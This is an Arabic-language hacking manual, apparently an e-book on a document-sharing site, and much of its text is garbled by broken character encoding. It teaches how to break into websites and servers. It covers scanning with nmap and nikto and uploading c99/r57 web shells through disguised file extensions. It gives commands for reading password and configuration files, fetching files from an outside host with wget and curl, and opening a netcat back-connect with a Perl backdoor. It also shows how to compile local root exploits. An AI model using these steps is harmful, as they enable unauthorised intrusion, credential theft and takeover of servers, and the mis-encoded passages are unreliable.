Upload
anon474311
View
161
Download
33
Embed Size (px)
Citation preview
بسم اهلل الرمحن الرحيم
H 4 C K I N G W 3 B
ال إله إال اهلل حممد رسول اهلل
هـ1431\6\9
اال ػ١ى نؼح اهلل تهواذح
اؽك هلل نب اؼا١ اظالج اال ػ أشهف األث١اء اه١
.ث١ا ؽك ػ آ طؽث ه ث١ إ ٠ اك٠
ا الػ ا إال تا ػرا اه أد ػال اغ١ب
تؼك,,, ذؽ١ح ؿ١ثح
فمك لد تؼ اىراب اؽك هلل األن ١ه و ما ترف١ك اهلل
اؽك هلل ػ و شء تكا٠را أذا ػك ارفكا أ ؼح نقخ ف
ما اىراب ف أل٠ح ا١ كف ػ ما اىراب افائكج ى
أـا ا١ ٠رى ما اىراب أنتغ فظي و فظ ٠فرف
ػ األـه ٠ر١ى و فظ ػ األـه تـهل أا١ث افظ األي اؽ١
ارفكح ؼاخ ؼي و١ف١ح االـرهاق افظ اصا أا١ة اـرهاق
االغ و١ف١ح اؽظي ػ شغهاخ الغ افظ اصاس أ األاه
ارفكح ف اـرهاق االغ أ ارفاط١ ؼي ذفـ ا١ف ق
افظ اهاتغ ا١ـهج ػ ا١هفه أ األقاخ ارفكح اؽظي
قػا م تعح ػ اىه ؿهق أا١ة افرهق ف , rootػ
التك اال ا ذرؼ أا١ة افرهق ف اـرهاق كف ,ػ١ح امهطح
ؼ١ ػ ث١ اصاي أنقا ا فرهق لغ ؼ١ التك ظغ
ؼاخ اال ػ اكف ٠أذ قن افرهق تعغ اؼاخ ػ
اكف ص ظق شغهج ف الغ ا إ لاه ش ٠م تاع تم
اؼاخ ػ الغ ىما اذا ى ارؼح افائـكج
حمتويات الكتاب افظ األي
خع اعاث
serverاظ١زفز
types serverأاع اظ١زفزاث
shellاش
r57.phpشزذ ش
Uploadزاوش اخس١
trickeryاخسا٠
trickery2اخسا٠
scriptاظىزبج
Vulnerabilitiesاثغـزة
غاث ابزدت
األخطاء ابزد١ت
:.جع اعاث .: تكا٠را ذظك الغ ذم تؼهع اؼاخ ػ اكف
ص إ١٠ طاؼة الغ ع ام اظا ارفك
http://www.netcraft.net/
http://www.whois.com/
Nmapؿ١ة ا٢ م تـه٠مح أـه تعغ اؼاخ ػثه أقاج
اافمرفهاض ا م األقاج ذم تػ الغ جظ١ف
ج ظ١غ اؼاخ ار لوها اتما ص ع ام افرغ
أ١٠ طاؼة الغ اافم افرؼح ع اظا ظ١ؼا
ظكا ف ػ١ح االـرهاق إ شاءاهلل
niktoؿه٠مح أ٠ؼا أـه تعغ اؼاخ ػثه أقاج
الو ذفرف ف nmapظ١فح م االقاج ذم تف أقاج
اث١هي ذظ١ث perlارفكاا أ اا ذؽراض رهظ غح
ػ ظاون الذم تػ اثنذاخ ف الغ اؼ١
ف أل تشهغ م األقاخ ف افظ اصا طثها ظ١
اهلل ارف١ك
:.اغ١شفش .: ظاو ارؼ١ف لغ ذى فاخ الغ ذظك ف١ ظاو
وث١ذه ػاق الو تاطفاخ غ١ه اعاو اؼاق وص ام ذرفك
اطفاذ وىثه ؼع امهص ف١ هػر ائ
24 اػ ما ثة و االغ شغـا 24ا٠ؼا رظ تاإلرهد
ما , اوصه لغ اؼك (ا١هفه) serverـاػ ٠رؼ١ف
٢ـه شهوح ٢ـه server ٠ؼرك
ظ١فر serverػهفا الا ٠مظك تـ
:.أاع اغ١شفشاث .:
ذفرف ١هفه إ أـه (ا١هفهاخ)
ا غ١ها xp or linunxاألـرالف ٠ى تاظا إا ا ٠ى
األظح الو ا٠ا ا
ا١هفهاخ ار ذهوة اظا م شائؼ ا١ى او ت
ف رـهق تئل اش ف األو ت ا١ىذفرف أاه و
اهلل أاه و ا١ى االو ت اشـ
اثة ف لاه ١١ىالو غاثا ا٠ى ا١هفه
اهلل ٠ى ؼا٠ح ١هفه طؼتح إـرهال وا ٠ىػ الو تئل
ا١هفه أـرهاق اؼ١ح ػائك ان ذى
(األوض ب) (ا١ىض)ذا ادذي أاز و
:.shellاشـ .:
وق ـث١س ا ف ذع ثهط تـه٠مح ذػ /تظـػ اىه
طالؼ١ره ـه تارظهف تالغ الو ؼة
تاث ٠ؼرثه ما اف ا اىق فا٠هي php ثهط تغح
ؽا٠اخ
اش ٠فرف ش إ أـه ألوه تؼؼا ا اؼهف اشن
ا٠ؼا وص١هج األرفكا الو ذموه اكف اؼك ذف١م ااه افرهق
c99.php
r57.php
phpshell.php
sniper-sa.php
perl
وا لوها اتما أ١ح اش ظ١فر لا ذفرف أاػا الو اكف
اؼك ا ذـث١ك أاه افرهق ف م ترفظ١ اش ع
r57.php
:.r57.phpشهغ ش .:
safe_mode: ON
safe_mode: OFF OFF أ ONا اف ق اا ا ٠ى
ا١ى ال٠ى ذـث١ك أاه onف ؼاح ا ا١ف ق
PHP version: 4.4.9 اطكان االتاذش
HDD Free : 361.63 MB HDD Total : 11.45 GB
و١ح اىا افانؽ ا ػ ا١هفه
/home/fawazhack/public_html
نىاه ػ ا١هف
Linux 2.4.20-42.9.legacy
ع اظا
uid=512(user) gid=512(user) groups=512(user)
ا١هفهطالؼ١ره ػ
Upload files on server
هفغ افاخ إ الغ
back-connect الذظاي ػى ت١هفه ص اد واخ
( r57.php اش ع ) تؼك ا لا ترفظ١
ػكا ه٠ك أـرهاق الغ التك ظق ؿه٠مح ذىا تػغ أ نفغ
اش ف الغ ا١هفه
ا ا٠
٠ر أرغالا ف وح ارغالي ا م شغهجأا ا ذى ػثه
إ الغ اركفshellاش تهفغ
ػ١ نفغ ف اش تـهق فرفح تارؽا٠ م هوى ذؽ١أ
ألوه تؼغ ا تؼك ل١
ارا ٠مصذ بشوض حح١
:.هاوى ارؽ١ .: تكا٠را ٠ى اركاق الغ ١ى هوى ارؽ١ ف١ ىما
www. fawazhack .com/up
or
www.fawazhack.com/upload
١ تاؼهنج ١ى اهاتؾ هوى ارؽ١ واهاتؾ ااتم اا
هوى ارؽ١
فظض هفغ ف١ ص اظن php ىهتد ثهط تغح
..ا٢طاخ إ أؾ
ػك اكـي ػ هوى نفغ ؼ١
ف ذالؼظ ظق ارا
االركاقاخ اؼgif, jpg, png, bmp, psd, zip, rar
تؼك ا ػهفا الا ٠مظك تهوى ارؽ١ لا ا ىهتد ػ
الغ ٠ف١ك ف نفغ افاخ وما
trickery :.ارؽـا٠ .: اا ارؽا٠ ف ا م ترغفاي هوى ارؽ١ فصال ك٠ا ش
ه٠ك ا م تهفؼ الو ال٠ى نفؼ تاشى اظاه أاى
c99.php
م تاظه إ االركاقاخ اؼ هوى ارؽ١
,gif, jpg zip,rar
تى٠اقج اركاق غ ت phpاأل م تئػافح ألركاق اش
تهوى ارؽ١
١ى ىما C99.php.zip
C99.php.rar
C99.php.jpg
C99.php.gif
اا ا ٠م تهفؼا ا ال٠رع١ة ـة اهفغ
ػك ػك نفغ اف م تاثؽس ف ف ا١هفه ػ هوى ذؽ١
أـه م ترـث١ك افـاخ ااتم
م اـه٠م األ راؼ١ ػ هاوى ارؽ١
trickery :.ارؽـا٠ .:
:.اطش٠مت اثا١ خحا٠ .: ف اـه٠م األ لا ترغفاي هوى ارؽ١ ار١ع اا ا ٠م
تهفؼا أ ال
اـه٠م اصا١ ذؼرك ػ ظق األركاقاخ اؼح اركاق
jpg and gifاظن ا
ا٠ؼا ذؼرك ػ هوى ارؽ١ ا ٠م ترؽ١ األواق افاط
م تؿ اىق notepadتاظن اال م تفرػ طنج تئرفكا
اظاه ظنج ف افىهج ش اماب إ اش م أ٠ؼا تفرػ اش
ش م تظك اىق افاص تاش إ اظنج الو notepadتـ
ذ ل١
ػك ظك اىق إ اش التك ا ذم تؼ اف ت١ وق اظن
اش تؽ١س ال٠ثم افح ت١ وق اش وق اظنج
script :.اىهتد .: تهاط ت١ؾ ٠ؽر ػ ذؼ١اخ أاه ؽكق ذؤق ظائف ؼ١
ذفرف اىهتراخ تىراترا إ غاخ ػك ص
Bash or asp or php إ أـه اغاخ
:.اصغـهج .:
Vulnerabilities ــاء تهع ٠مغ ف الغ
٠أذ ما افـاء ثهع اثهاط اىهتراخ ٠رغا افرهق
ف اطي لغ
٠أذ قن االغ ار ذر ف ما اعاي عاي االــاء
Vulnerabilitiesاثهع١ ا اصغهاخ
اصغهاخ ا١ىن٠ر تاصغهاخ ذر م االغ
http://www.exploit-db.com/
http://www.securityfocus.com/archive/1
http://www.jaascois.com
http://www.securiteam.com
http://securityreason.com
http://www.milw0rm.com
http://www.kernel.org
http://www.ukrt.f2s.com
http://www.ussrback.com
http://www.packetstorm.securify.com
http://www.secureroot.com
http://www.rootshell.com
http://www.ussrback.com
http://www.securitydot.net
http://www.packetstormsecurity.org
م االغ و ٠ ا اثػ١ا ذػغ أـه اصغهاخ ارعكاخ ف
اثهع١اخ اظات تفـاء ا إ لاه
:.ااع اصغهاخ .: عأروش بعط أشش اثغشاث اجدة حا١ا
Jommla
File Include
XSS
Sql Injection
Buffer over flow
Joomla
ظال ا ىهتد الو ظها ظق شغهاخ وص١ه ف ما اىهتد
اقنظا ػ اصغهاخ ٠راظك ما اىهتد تشى وث١ه ف االغ
االظث١ ػك اكـي لغ ٠ؽ اىهتد ارا ف ذم تئـرهال
تئل اهلل وا لا ا ٠ظك شغهاج تما اىهتد
File Include
ما اع اصغهاخ ٠م تهفغ ا إقناض عك ـانض الغ ػثه
shellاهتؾ تعك ـانظ ا ٠أذ قن افرهق تهتؾ ف ارع
xss
أا ما اع اصغهاخ ـالا مكن ؽة و٠ىى ص األق١ أ
ػؼ ؼ١ تالغ
Sql Injection
٠م ػثه أــاء تهع١ح تئناي أاه إ لاػكج ما اع اصغهاخ
أه مهاءج ؼاخ ػؼ٠ح األق نل اؼك أ أه رغ١١ه ص اث١ااخ
اهن ٠ى تم اصغهج ؼم الغ تاش وح
Buffer over Flow
"اـفػ"ما اع اصغهاخ ذم تع ػ ا١هفه ٠ ع
٠م افرهق تاع ػ مـ ؼ١ ف ا١هفه ص اع ػ
اكف لاه إػؼاف اذظاي ا١هفه فظ ftpتنخ االف ذ ت
اذظا تما اثنخ أ أ تنخ ٠م تئرغال افرهق اثنذاخ
. افرؼح
ىخف بزا امذس اثغشاث زا اع اثغشاث اشسة
اخاجذة حا١ا بىثشة ال غ أ اثغشاث وث١شة جذا
:.غاخ اثهعح .: ألوه ا اشه م اغاخ تهع ٠ظكن ثهط م اغ ــاء فاقغ ٠رط شغهج
٠ر ارغالا ػ ؿه٠ك افرـهق
ماييل تومن هذه اللغا
phpغت
cغت
perlغت
htmlغت
pythonغت
Rubyغت
م اغاخ أ اغاخ اظقج ؼا١ا ت١ اثهع١ ذعق
غاخ أـه وص١هج ى لد تعغ أفؼ اغاخ اشائؼح
ارا ٠مصذ باألخطاء ابشج١ت
:.األــاء اثهع١ح .: ا ــاء ٠ظكن ػاقذا ك٠ه الغ ص ارؼك٠ ػ اىهتراخ
ػك ذظفؽه لغ ؼ١ , ٠رط ما افـاء phpأذؼك٠ ف تئركاق
ا رك ف ذالؼظ ظق ــاء وا ف اشى ارا
الؼظ ٠رى ان ما اان ٠كا ػ ىا افـاء
Home/aqaedcom/public_html/shia_news/detail
ف أل تشهغ أظىاء افـاء ارا
home
اي عك ررط ا ٠مغ ف١ عكاخ فاخ االغ ار ػ ف ا١هفه
aqaedcom
اا اعك ارا ا ٠ون الغ تئىاا ارف١ إ ا ظ إ ؼح
ارؽى ت
public_html
اا اعك ارا ا ٠ؽر ػ ظ١غ فاخ الغ ىهتراخ ا إ
لاه
افص اثا
find in errorsابسث ع األخطاء
find sicreptsابسث ع ثغزاث اظىزبخاث
niktoإظار وافت اعاث اثغزاث بالع بظخخذا أداة
Shadow Security Scannerظر االع بظخخذا بزاح
Intelli tamperأطخخزاج دذاث الع اظخذف عبز بزاح
:.البحث عن األخطاء .:
Find in errors
ؿه٠مح اثؽس ػ االــاء ذؼرك ػ١ه ف اثؽس ػ ا١هفه
الغ م تاماب إ ip تك٠را م تئرفهاض
Start ش اماب إ run ش م تػغ األهcommand ا
cmd ش ذفهض ا شاشح اكي أ ظح اكي م تػغ األه
ping fawazhackارا
ناتؾ الغ اركفfawazhackغ اؼ ا
ipػك ػغ ما األه الؼظ ظق
ـاص تا١هفه اكف لاه فؽض الغ ػثه اـه٠مح ipما
ارا١
اظق تظح األاه ipل تؿ
ألة إ إؼكا االغ ارـا١ـ
www.bing.com or www.msn.com
غ امـرا :ipش ل تػغ وح
١ظثػ ىما
ip:123:123:123
الغ اركف ip 123:123:123غ اؼ أ
ػ ف ا١هفه م االغ ار لا تئرفهاض الغ أاالؼظ
ؽظي ػ األــاءاؼك م ا٢ تىراتح تؼغ ١هفهظ١ؼا ػ
أرغالــاء ؼ١
##################Errors##################
# error #
# public_html #
# mysql #
# warning #
##################Errors##################
أ اثؽس ػ هاوى ذؽ١ م تارؽا٠ ػ١ا وا لوها اتما ؿه٠مح
ارؽا٠
Upload
أ م تىراتح تاؼهت١ح
هوى ذؽ١
:.البحث عن ثغراث السكربتاث .:
ف م اـه٠مح ف م تاثؽس ػ شغهاخ اث ىهتراخ
شنج ص
Wordpress IP.Board
Phpld phpbb
Joomla Infinity
php-fusion vBulletin
smf ibd
XMB WHMCS
4smart Burning Board
Almnzm Arab Portal
Discuz! 6.0 W eb2.0
Flash Chat IP.Board
coppermine 4images
ا١هفهip ػؼا تؼك bingتؼك اثؽس ػ م اىهتراخ ف لغ
م تاماب إ إؼك الغ اصغهاخ لك لوها ص م االغ
http://www.milw0rm.com
ش م تارظ إ ـاح اثؽس
http://www.milw0rm.com/search.php
ؼغ أ اىهتد ام ظكا ف ا١هفه م تاظه إ شغهاذ
ذـث١ما ؼر اطي إ ر١عح
:. إظهار كافت الوعلىهاث والثغراث بالوىقع .:
niktoبستخذام أداة
تا٠ اؼا إظان ؼاخ الغ اصغهاخ : ظ١فح م األقا
perlا ثهط تغح اث١هي فماه ؽراض رهض غح اث١هي
م ترؽ١ األقا ا
http://cirt.net/nikto/UPDATES/
غ اؼ ا ما الغ ٠ر تاألقا ٠م و ك ؼ١ ترؽك٠س إػافح
شغهاخ ظك٠كج ألقا ل ترؽ١ أـه إطكان م األقا الغ ارا
تؼك ذؽ١ األقا م تػؼا ف عك غح اث١هي ص األركاق ارا
C:/perl/bin/nikto
ؿه٠مح ذشغ١ االقا
م تاماب إ ظح اكي ش ؼغ األه ارا
Cd\
ش األه االـه
Cd perl/bin
ش
Cd perl/bin/nikto
ش ؿه٠مح ارشغ١ أال م تػغ االه
Perl nikto.pl
ما األه ػ١فر ٠م تاظان ـ١اناخ األقا
الو ا٠ا ت١ م األاه أه
-host
األ م تػغ األه واال
Perl nikto.pl –host www.fawazhack.com
تؼك ػغ األه ارا ف ذه ا لا تاظان ع ظا ارشغ١ أ٠ؼا
ؼاخ اـه dnsاطكان ؼاخ ؼي اك ا اي
إظان اصغهاخ تالغ
:.هسح الوىاقع بستخذام برناهح .:
Shadow Security Scanner
أال ظ١فح ما اثهاط ٠م تػ الغ إظان اصغهاخ األاو
اؽاح ف الغ أ ماؽ اؼؼف تؼك ذصث١د اثهاط
New sessionم تاؼغؾ ػ
ف ذأذ اشاشح ارا١ح
nextم تاؼغؾ ػ
add hostش
:name or ipف م اشاشح م تئػافح أا
ناتؾ الغ اركف أ إ٠ث ا١هفه
addم تؼك إػافح الغ اركف م تاؼغؾ ػ
تؼك إػافح ناتؾ الغ الؼظ اظنج ارا١ح
next ٠ظك الغ اركف تؼك لاه hostالؼظ ف لائح
start scanتؼك لاه م تاؼغؾ ػ
ف ٠م اثهاط تػ الغ إلا وا ف الغ شغهاخ ف
ذأذ ػ اشاي اظنج األـ١هج ف افاح ا١ه
:.أستخراج هدلذاث الوىقع الوستهذف .:
Intelli tamperعبز بزاح
افائكج م اـه٠مح م تئرفهاض عكاخ الغ اىهتراخ
اهوثح ػ ما الغ م ترؽ١ أ٠ؼا افاخ ار ذر تئركاق
ش م ترؽ١ا فؽظا تأرفكا تهاط phpغح اثهعح
notepad++ اثؽس ػ شغهاخ تؼك ارغ١هاخ $
افظـ اصاس
linunx and win xpاخفز٠ك ب١ أاز
command in shellاألاز اظخخذت ف اش
أاز اضغط فه اضغط _
أاز اخخزق اذاخ١ت _
أاز اخخزق اخارخ١ت _
اصالز١اث
شزذ اصالز١اث
Permissionsاخصار٠ر
أشىاي اخصار٠ر _
اخفز٠ك ب١ ادذ اف _
Safe_mode: ONحخط اظ١ف د
userلزاءة افاث بصالز١ت ٠سر
connect backdoorاالحصاي باظ١زفز ع طز٠ك اباوذر
:.Linux and Win xpاخفش٠ك ب١ أاش .:
ف اجذي اخا بعط أاش و ا١ىظ االوظ ب
linuxاجت ا١ ااش
xpاا اجت ا١غش أاش
Xp Linux
ىرف تما اعكي أاه و ا١ى االو ت م األاه
ارفكح ف وال اظا١ األاه وص١هج الو م األاه
أألا١ح ف اظا١
:. األاش اغخخذ ف اش.:
Linux
أا األاه ارفك ف اش ػ ؼة ا١هفه إا ا١ى أ أو
ت اؼاقج ٠ى ا١هفه ظا ١١ى ماه ف أل تشهغ أاه
ا١ى
أواهر اللينكس تقسن إلى ثالثت أقسام هنها
أواهر الضغط وفك الضغط_
أواهر الهكر الذاخليت_
أواهر الهكر الخارخيت _
:. األاش اغخخذ ف اش.:
Linux أاش اعغط فـه اعغط
بشى خخصش حف١ذ ز األاش ف حخط حا٠ت اغ١شفش أ غشض اء ف أعخخذاا
أاز اضغط فه اضغط
ظ١فت األز األز وخابخا ثاي ع األز خض١ر
qzip failname qzip zip أز اضغط باخذاد
unzip failname unzip zip از فه اضغط باخذاد
tar -zcf zz.tar daily tar -zcf tar أز اضغط باخذاد
tar -zxf zz.tar tar -zxf tar أز فه اضغط باخذاد
tar -czvf file name.tar.gz file name.sql tar -czvf gz أز ضغط اف باخذا
gzip -d file.gz gzip -d gz فه اضغط باخذاد
tar -czvf file name.tar.gz file name.sql tar -czvf و١ف١ت ضغط لاعذة اب١ااث
tar -zxvf file name.tar.gz tar -zxvf و١ف١ت فه لاعذ اب١ااث
tar -czvf /home/fawazhack/public_html/n3.tar.gz n3 tar -czvf tar.gz ادذاث باخذاد از ضغط
:.األاش اغخخذ ف اش .:
Linux أاش اخخشق اذاخ١ت
ا مف ل١ال خأ ف وج اذاخ١ت ف ذ اىت أ األاز
اظخخذت ف ادذي أدا حف١ذ ف اخخزاق الع اذ زفع ع١ اش
أ دذ الع
اذاخ١تاخخزقأاز
ظ١فت األز األز وخابخا ثاي ع األز خض١ر
Ls Ls اطخعزاض افاث
Ls ls –la اطخعزاض افاث ادذاث اخف١ت
اخصار٠ر
Pwd Pwd حسذ٠ذ اىا عاظ١زفز
ls;pwd ; اداة ازبط ب١ األاز
wget http://www.fawazhack.com/ll.zip;ls ll* Wget أزاظسب
curl -o ./ll.zip http://www.fawazhack.com/ll.zip;ls ll* curl -o ./ از اظسب ا٢خز
History History أز عزفت خ١ع األاز اخ فذث باش
mkdir alkasr Mkdir اشاء دذ خذ٠ذ
rm failname Rm أز اسذف
rm -r dir rm –r زذف دذ بد١ع افاث
edit failname Edit أز اخعذ٠
Who Who از اخص١ ع اظ١زفز
Cd Cd از دخي ادذاث
cd .. cd .. از اعدة خف
Mv Mv از اعادة اخظ١ت
Find Find از ابسث
أز حشغ١ ابان در ./ ./
uname –a uname -a أز عزفت اصذار اظ١زفز
ls ftp.zip* * از ٠ز ى
man ls man از اظاعذة
drwxrwxrwx chmod 777 dd chmod أز إعطاء اخصز٠ر
touch alkasr.php touch أز اشاء ف فارغ
gcc alkaser.c -o fawazhack Gcc حزخت اىبا٠ ا االوظب٠ج
usr/bin/perl فاث اب١زي حبذأ بــ ال ٠سسخاج حزخت ٠بذأ اىد بذ اىت
include فاث اظ حبذأ بــ ترجمة وتشغيل فقط ٠بذأ اىد بذ اىت
:. األاش اغخخذ ف اش.:
Linux أاش اخخشق اذاخ١ت
عزض ف م األاه ذف١كا ف ارم اؽة لهاءج االغ األـه
.خ١ع االع اخ ع اظ١زفز
أاز اىز اخارخ١ت
ظ١فت األز األز وخابخا ثاي ع األز خض١ر
cat /home/*/public_html/_vti_pvt/access.cnf cat عزض خ١ع االع اخ ع اظ١زفز
cat /home/*/public_html/_vti_pvt/service.pwd cat عزض خ١ع اباطرداث ع اظ١زفز
cat /usr/local/apache/conf/httpd.conf cat عزفت عزض صذر اظ١زفز
find / -name httpd.conf find عزض اصذر
more /etc/userdomains more CAT از شابت ألز
pico /home/burst/public_html/index.html pico حسز٠ز اصص
vi /home/burst/public_html/index.html vi از حسز٠ز ب اىث١ز اشا٠ا ى اصعب
اظابك
valiases ا ؽكق ls -la /etc/valiases ls ؼهفح االغ ا ػ ا١هفه غ ا١ون
ls /var/named ls ؼهفح ظ١غ االغ ا ػ ا١هفه
valiases ا ؽكق ls /usr/local/psa/home/vhosts/ ls ؼهفح ظ١غ االغ ػ ا١هفه
perl fawazhack.pl perl ذشغ١ اث١هي
cat /etc/passwd اتؽس ػ bash cat اه ارفهاض ؼاتاخ اش
:.ارظان٠ػ .: Permissions
افاخ اعكاخ ار ٠ؼؼا اه الغ ا ا١هفه اؼك ـظائض
اؽا٠ر ػ فاذ
ػ ارهاـ١ض ٠ؼؼا ك٠ه ا١هفه ػ فاذ ؽا٠ ػك طي
ا تشى وا اـه م افاخ ال ٠رـ١غ األرفاقأ رفك
ارظان٠ػ ذرى ػ اؽ ارا
اف فمؾ ق أ ذؼك٠ ذظان٠ػ ذىه لهاءج ؽر
ف صػ ا ن٠ػ ٠ىه فؼ اذه٠كاذض
لهاءج اف ا ارؼك٠ ػ١ ا اؿ ا ذشغ١ ا م ا ؼمف
ذظان٠ػ ذؼه فؼ افاط١ر١ ااتمر١
:.أشىاي ارظان٠ػ .: ٠رغ١ه نل شالز ـااخ ٠ظك ى ذظه٠ػ نى ؼ١ ال
777 :ما اؼك ارظان٠ػ
rwxrwxrwx- افاخنى ػ
drwxrwxrwx اعكاخنى ػ
777 الؼظ اظنج ارا١ ف اش ٠ؽ ذظان٠ػ
وا ف اشى ارا ف اظن الؼظ افاخ تعاثا ارظان٠ػ
.fawazhack.php : ف Hacker : عك
م طنج أـ اؼى٠ى رؼهف اى٠ك ػ ارظان٠ػ
:. ارفه٠ك ت١ اعك اف .: عك الؼظ hacker:افهق فمؾ ف األركاق ف اش وا لوها اتما ا اعك
:ا ال٠ظك اركاق افاخ قائا ذى ا أركاق وا لوها اتما أ٠ؼا اف
fawazhack.php ف اش
:.شهغ اظالؼ١اخ .: ؼهفح طالؼ١اذه ف اش أظه أػ اش وا ف اظنج ارا١ح
( id ) أ ل تئرفكا أه ؼهفح اظالؼ١اخ
run commandف ـاح
ف ذظه ارائط
uid=512(user) gid=512(user) groups=512(user)
ىما ػهفا ا٠ ذمغ اظالؼ١اخ
ارا ٠مصذ باصالح١اث
:.شهغ اظالؼ١اخ .: ػك نفغ اش إ أؼك االغ ان ل١ق رفكاه اش
User: طالؼ١اخ
م اظالؼ١اخ ال٠ى لهاءج لغ أـه
ذمرظه ػ الغ ام هفع ػ١ اش فمؾ
شىا ف اش
uid=512(user) gid=512(user) groups=512(user)
nobody: طالؼ١اخ
م اظالؼ١اخ تئىاه ارم أ٠ؼا لهاءج فاخ االغ ار ػ ف
ا١هفه تئىاه ارؼك٠ ػ١ا إلا واد ظهؼ
شىا ف اش
uid=99(nobody) gid=99(nobody) groups=99(nobody)
apache: طالؼ١اخ
nobody تاظالؼ١ شث١ح اظالؼ١ م
شىا ف اش
uid=404(apache) gid=404(apache) groups=404(apache)
root: طالؼ١اخ
م اظالؼ١اخ ذؼ ك٠ه ا١هفه ٠ه ظ١غ اظالؼ١اخ ٠ى
ارؼك٠ ػ فاخ االغ ا٠ؼا تئىا ارظه٠ػ آ ف وا
شىا ف اش
uid=0(root) gid=0(root) groups=33(root))
:. ذفـ ا١ف ق .: ػك إـرهاق لغ ؼ١ نفغ اش ف ذعك آ ا١ف ق فؼاي ا
٠ؼـ اىص١ه أاه ا١هفه و١ف ؼهف أ فؼاي ف اش الؼظ أػال
ف ذعك اى ارا١ ١ف ق
Safe_mode: ON
أ٠ؼا ف م اؽا ال٠ى ذـث١ك أاه ا١ى
php.iniاؼ رفـ ا١ف نفغ ف
ف اش Upload ؿه٠م اهفغ ـ١ان
جالؼظ ار١ط refresh تؼك اهفغ ل تؼ ذؽك٠س
م ؿه٠مح ذفـ ا١ف ق ألا وا فؼاي
:.user بصالح١ت افاث لشاءة.:
وا شهؼا اتما ف شهغ اظالؼ١اخ ا طالؼ١اخ ا١ون ؽكق
االغ ت١ ارم ذؼه ظكا
الو اـه٠مح ارا١ إ شاءاهلل ف رفـاا تـه٠م ظ١ك م
تمهاءج ؽر الغ اركف ػ ف ا١هفه
symlink اااال م اـه٠مح ذؼرك ػ قاح
ارظفػ رؼهػ إ اش sym2م تهفغ اىهتد
شا١ا م تئؼؼان ا١ون لغ اركف ف ف ا١هفه
ام نفؼا ف اش م تػغ اؼاخ االو sym2ف اىهتد
اش ع١ از شفع الع ٠صس م بظع :اال اخات
اذف الع ٠صس عع :اثا١ت اخات
اغىش٠بج ع١ سافع١ ا اجذ اع عع :اثاثت اخات
واال لشاءح اشاد اف غاس عع :اشابعت اخات
ام ٠ؽر ػ اث١ااخ ار config ف ٠أذ تفاخ اىفك
ذىه ف اـرهاق الغ اركف ػ ف ا١هفه
:.در االحصاي باظ١زفز ع طز٠ك ابان.:
connect backdoor
اثان قن تاؼهت١ح ٠مظك تا تاب ـف ف ا تئىاا ػ تاب
ـف تا١هفه
ظ١فر فرػ فم تا١هفه اإلذظاي perlاثان قن ثهط تغح اث١هي
ت
ذشغ١ اثان قن
2121اال اثان قن ٠فرػ فم
واخ اد 2121 اثنخ ػ رظد هغ
م تارظد ػثه ارفكا األه ارا ف ظاوا
nc -v -l -p 2121
إ اش وا لوها اتما ؿه٠مح اهفغ backdoor.plم تهفغ
اش
م تػغ االه ارا ف ـاح األاه وا لوها اتما أ٠ؼا
perl backdoor.pl ip 2121
:ip نل اإل ت افاص تعاون
ش ل تاماب إ اد واخ
ف ذالؼظ ا ذ االذظاي
افص ازابع
root in serverأ طزق اسصي ع صالز١اث ازث
local rootاواي رث
اخفز٠ك ب١ اواي اخزخ اغ١ز خزخ _
find localrootابسث ع واي رث _
netcat االحصاي باظ١زفز عبز اج واث
rootاسصي ع ازث
حثب١ج ازث و١ج ع اظ١زفز
ع اص د٠فض
ظر أثزن اظ١زفز
:.أ طشق احصي ع صالح١اث اشث .:
Root in server
بذا٠خا البذ عشفت طشق احصي ع صالح١اث اشث حجذ عذث طشق
,,ألخز سث ف اغ١شفش ـا
ع طش٠ك اواي سث اعخغالي ثغش بى١ش اغ١شفش .1
ع طش٠ك اعخغالي ثغشاث ابشاج اخ ع فظ اغ١شفش ا اشوب ع١ .2
ع طش٠ك لشاءة بعط افاث اخ ٠ى ف١ا باعسد اشث .3
:.localrootاواي سث .:
اواي تهاط ثهط إلرغالي شغه تئطكان اى١ه اواالخ
ذؽراض إ ارهظح لث ارشغ١ ما أه ارهظ تؼك C ثهع تغح
نفغ اواي إ ا١هفه ػ ؿه٠ك اش
م ترف١م األه ارا
gcc local.c -o local
:.اخفش٠ك ب١ اواي اخشج اغ١ش اخشج .:
فؼهف أ غ١ه رهظ cأال إلا وا اواي أرا تئركاق
اواي ارهظ أا ا ٠ر ق أركاق ا أ غ١ه
اثة ف لاه ا اج اى١ه cذموه قائا ا اواي رهظ تغح
cف ظا ا١ى ذى ثهعح تغح ا
:.ابحث ع واي سث .: ف افظ األيذظك الغ ذر ف ما اعاي وا لوها اتما ف
تؼغ االغ ار ذر ف عاي اصغهاخ Vulnerabilitiesاصغـهج عاي
أ٠ؼا ١ا ذر ف اواالخ ا ؼغ لغ رـث١ك ػ١ ف عاي اثؽس ػ
م تاماب إ أؼك االغاواي نخ
http://www.exploit-db.com/
ػك اكـي لغ ذظك ػكخ ـ١اناخ م تاماب إ اثؽس
تؼك اكـي ػ ـاح اثؽس م ا٢ تاظه إ اش ه ع اظا
ذؽك٠ص وا ف اظنج ارا١ح
٠2.6.18ظك ع اظا ارؽك٠س uname –aالؼظ أا
م األ تػغ ف ـاح اثؽس ف الغ
Local 2.6.18 ا localroot 2.6.18ا
local root exploit 2.6.18
وما تئل اهلل ؽظ ػ اواي
ا تؼغ االغ
http://www.exploit-db.com
http://www.milw0rm.com/local.php
http://www.kernel.org/pub/linux
http://www.securityfocus.com
ف عايافظ األيأ ل تاهظع إ إ
Vulnerabilitiesاصغـهج
ز ص للا ػ ؿه٠ك ؽهواخ اثػlocal root exploit 2.6.18
netcat :.االحصاي باغ١شفش عبش .:
لث اؽظي ػ اواي نخ ٠ىا االذظاي تا١هفه ػثه أقاج اد
واخ م تاكـي إ ظح اكي أ ظح األاه
ش م تارظد ػثه األه ارا ف ظح اكي
nc –v –l –p port
تافم اهاق ارظد ت وا ف اظنج ارا١ح portتكي وح
ا٢ ل تاماب إ اش الة إ األفـ ف ذعك
back-connect
ف م افااخ اصالز ٠ـة
Ip ٠مظك تا إ ت ظاون
Port افم ام لد تارظد تـ
Use قػا ػ ا١ا
connectش ل تاؼغؾ ػ
لة إ اد واخ ف ذعك ا ذ االذظاي تا١هفه
:.احصي ع اواي سث .:
أال التك االذظاي تاد واخ
م تهفغ اواي إ ا١هفه التك نفؼ إ عك ٠ؽ ارظان٠ػ
777اىا
777أ وا اواي غ١ه رهظ م تئػـائ أ٠ؼا ارظان٠ػ اىاح
تاأله ارا
chmod 777 local.c
م تؼك إػـائ ارظان٠ػ اىاح ترهظر تاأله ارا
gcc local.c –o local
localتؼك ػغ األه ارا ذ ذهظح اواي ف ذعكج وارا
ق اركاق وا لوها اتما
ش م تئػـاء اواي ارهظ ارظان٠ػ اىا chmod 777 local
